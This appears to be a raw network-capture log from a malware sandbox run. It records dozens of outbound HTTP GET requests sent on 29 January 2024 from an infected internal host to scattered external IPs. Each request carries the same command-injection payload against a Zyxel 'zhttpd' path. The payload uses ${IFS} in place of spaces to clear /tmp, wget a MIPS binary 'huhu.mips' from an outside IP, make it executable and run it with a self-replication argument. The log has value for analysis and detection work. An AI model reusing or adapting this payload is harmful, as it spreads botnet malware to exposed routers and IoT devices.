                                              Jan 29, 2024 07:03:04.572879076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              545192.168.2.143824420.98.174.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:04.572954893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              546192.168.2.1453144196.87.203.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:04.573086977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              547192.168.2.1453746148.241.17.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:04.573139906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              548192.168.2.144648096.36.240.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:04.573194027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              549192.168.2.143399872.107.100.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:05.578258038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              550192.168.2.145877689.241.244.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:05.578305006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              551192.168.2.1436164190.118.123.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:05.578339100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              552192.168.2.143888836.128.90.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:05.578414917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              553192.168.2.1460494160.195.236.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:05.578464031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              554192.168.2.1446298188.93.56.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:05.578512907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              555192.168.2.1437380194.140.3.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:06.582355976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              556192.168.2.1460096141.72.157.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:06.582405090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              557192.168.2.1452648213.114.103.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:06.582449913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              558192.168.2.1436078223.29.45.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:06.582499027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              559192.168.2.143454036.59.173.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:06.582554102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              560192.168.2.143945463.156.174.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:06.582596064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              561192.168.2.143929490.2.222.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:07.586308956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              562192.168.2.1441256112.219.56.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.589544058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              563192.168.2.144478277.21.240.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.589576006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              564192.168.2.1444326107.176.222.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.589596987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              565192.168.2.1452078206.167.131.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.589636087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              566192.168.2.144209024.248.81.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.589668036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              567192.168.2.1433660197.97.233.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.589703083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              568192.168.2.1451922151.169.146.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.589744091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              569192.168.2.1449344159.200.13.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.589782953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              570192.168.2.1434466187.178.136.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.589785099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              571192.168.2.1450956153.244.35.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.589826107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              572192.168.2.1454994120.64.32.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.589850903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              573192.168.2.1444698182.144.78.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.589894056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              574192.168.2.145094012.203.23.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.589904070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              575192.168.2.1433142222.44.237.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.589945078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              576192.168.2.144845073.18.7.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.590085983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              577192.168.2.1439534156.179.34.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.590131998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              578192.168.2.1454794115.60.205.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:08.590195894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              579192.168.2.145055240.25.196.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:09.594917059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              580192.168.2.1435810166.18.219.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:09.594950914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              581192.168.2.1434186144.50.106.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:09.594994068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              582192.168.2.1434462172.182.97.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:09.595029116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              583192.168.2.145485674.161.87.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:09.595062017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              584192.168.2.1444090211.31.113.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:09.595086098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              585192.168.2.143477696.242.156.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:09.595233917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              586192.168.2.145663687.178.159.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:10.600419044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              587192.168.2.1453666126.174.180.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:10.600469112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              588192.168.2.1456286194.56.38.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:10.600487947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              589192.168.2.1444020114.141.98.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:10.600646019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              590192.168.2.146028489.93.96.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:10.600714922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              591192.168.2.144841627.228.165.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:10.600796938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              592192.168.2.1448988200.86.1.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:11.606030941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              593192.168.2.1453180113.152.229.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:12.611061096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              594192.168.2.145874412.155.62.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:12.611095905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              595192.168.2.143457496.46.41.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:12.611167908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              596192.168.2.1435578143.163.44.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:12.611211061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              597192.168.2.1441110152.24.76.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:14.622909069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              598192.168.2.145079243.76.173.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:15.628230095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              599192.168.2.1455346204.52.178.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:15.628278971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              600192.168.2.143335851.223.104.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:15.628402948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              601192.168.2.146067068.151.16.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:16.635169983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              602192.168.2.1450566131.150.52.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:16.635207891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              603192.168.2.1440246132.29.35.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:16.635265112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              604192.168.2.1434968101.189.137.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:16.635433912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              605192.168.2.144408444.249.155.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:17.639211893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              606192.168.2.1435396171.147.216.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:17.639259100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              607192.168.2.144706079.7.181.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:17.639282942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              608192.168.2.1434418145.226.6.123443
                                              TimestampBytes transferredDirectionData
